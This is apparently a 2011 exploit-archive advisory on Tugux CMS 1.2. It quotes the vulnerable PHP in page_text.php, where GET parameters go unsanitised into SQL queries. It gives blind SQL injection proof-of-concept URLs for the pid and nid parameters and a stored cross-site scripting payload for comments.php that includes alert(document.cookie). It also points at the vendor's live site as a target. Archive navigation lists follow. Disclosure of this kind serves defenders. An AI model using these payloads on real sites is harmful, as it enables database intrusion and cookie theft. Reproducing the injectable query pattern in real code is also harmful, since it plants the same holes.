Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection: Posted Jul 11, 2011; Authored by eidelweiss; Tugux CMS version 1.2 suffers from cross site scripting and remote blind SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 1f9a246f7dbc21b4b2e261cf9980dee0e0b9187890fd39200f9a627818533f85; Download | Favorite | View

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

===================================================================
    Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss)
===================================================================
  
Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  BLind SQL Injection
Download link:  http://www.tugux.com/uploads/47/tugux_cms.rar
Author:     eidelweiss
contact:    admin[at]eidelweiss[dot]info
Home:       www.eidelweiss.info
  
  
References: http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple-vulnerability.html
  
===================================================================
  Vuln c0de on page_text.php

<?php 

session_start();
require_once "scripts/connect_to_mysql.php";


if (isset($_GET['pid'])){
$pageid=$_GET['pid'];
//------------------------------------------------
$sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1";
$query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row=mysqli_fetch_array($query)) {
      $date = $row["lastmodified"];
}
mysqli_free_result($query);

//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
  $admin = $row["admin"];
  }
mysqli_free_result($query);
//------------------------------------------------
//------------------------------------------------
$sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1";
$query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error());
while($row = mysqli_fetch_array($query)){
  $body = $row["pagebody"];
  }
mysqli_free_result($query);
}
//------------------------------------------------
if (isset($_GET['nid'])){
  $nid=$_GET['nid'];
$sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection));

  
===================================================================
  
    exploit & p0c
  
[!] page_text.php?nid=[valid nid]
[!] page_text.php?pid=[valid pid]
  
    Example p0c
  
[!] http://server/page_text.php?nid=12    <= True
[!] http://server/page_text.php?nid=-12   <= False

[!] http://server/page_text.php?pid=51  <= True
[!] http://server/page_text.php?pid=-51  <= False

  
[+] http://server:3306    <= download the file , save and open with c++ or wordpad will show mysql version
  
[!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D

===================================================================
  
Software:   Tugux CMS
Vendor:     www.tugux.com
Vuln Type:  xss
Download link:  http://www.tugux.com/uploads/47/tugux_cms.rar
Author:     eidelweiss
contact:    admin[at]eidelweiss[dot]info
Home:       www.eidelweiss.info
  
====================================================================

comments.php file is persistant to xss attack

Go to 

http://server/comments.php

and put or type this xss c0de into the command box

';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script>

then the site will direct you to

http://server/latest.php?nid=

and there you go.. xss will pop up

p0c:
http://server/comments.php
or
http://server/path/comments.php

official site: http://www.tugux.com/comments.php

Gratz:

- YOGYACARDERLINK , DEVILZC0DE , etc
- Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua)
  
====================================================================
  
    Nothing Impossible In This World Even Nobody`s Perfect

      Hacking is Art
  
===================================================================
  
==========================| -=[ E0F ]=- |==========================

Top Authors In Last 30 Days

Red Hat 282 files
Jay Turla 150 files
indoushka 149 files
Ubuntu 69 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 31 files
H D Moore 31 files
Debian 30 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,059)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,725)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,806)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

Share This

Tugux CMS 1.2 Cross Site Scripting / Blind SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems